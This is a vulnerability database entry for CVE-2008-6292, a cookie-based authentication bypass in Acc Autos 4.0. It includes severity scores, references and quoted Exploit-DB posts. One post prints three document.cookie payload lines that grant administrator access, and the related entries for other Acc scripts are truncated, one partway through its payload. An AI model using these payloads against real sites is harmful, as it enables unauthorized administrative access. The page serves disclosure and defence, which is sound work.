CVE-2008-6292
Published 2009-02-26
Priority: P355
Severity: high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.74% (84.3th percentile)
Acc Autos 4.0 allows remote attackers to bypass authentication and gain administrative access by setting the (1) username_cookie to "admin," (2) right_cookie to "1," and (3) id_cookie to "1."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| accscripts | acc_autos | — | — |
No detection rules found.
Exploit-DB
Acc Autos 4.0 - Insecure Cookie Handling
exploitdb·2008-11-03
CVE-2008-6294 Acc Autos 4.0 - Insecure Cookie Handling
---
Author: x0r - Road Crew - Evolution Team
Cms: Acc Autos v4.0
Bug: Insecure Cookie Handling
Site: http://pro7.altervista.org/v2/
Exploit:
[+]javascript:document.cookie="username_cookie=admin";
[+]javascript:document.cookie="right_cookie=1";
[+]javascript:document.cookie="id_cookie=1";
Live Demo:
http://www.accscripts.com/autos/demo/admin/
Greetz: 8\10\2008..The Dream Becomes Reality ...Bimb4 I Love You.
# milw0rm.com [2008-11-03]
Exploit-DB
Acc Real Estate 4.0 - Insecure Cookie Handling
exploitdb·2008-11-03
CVE-2008-6294 Acc Real Estate 4.0 - Insecure Cookie Handling
---
###########################################################################
# [~] Discovered by : Hakxer
# [~] Type Gap : Acc Real Estate v4.0 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/realestate/admin-area-specifications.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################
Bug In : /admin/Ind
Exploit-DB
Acc Statistics 1.1 - Insecure Cookie Handling
exploitdb·2008-11-03
CVE-2008-6294 Acc Statistics 1.1 - Insecure Cookie Handling
---
###########################################################################
# [~] Discovered by : Hakxer
# [~] Type Gap : AccStatistics v1.1 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/accstatistics.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################
Bug In : /admin/Index.php
PoC : javascript:d
No writeups or analysis indexed.
http://secunia.com/advisories/32517
http://www.securityfocus.com/bid/32083
https://exchange.xforce.ibmcloud.com/vulnerabilities/46287
https://www.exploit-db.com/exploits/6968
Published: 2009-02-26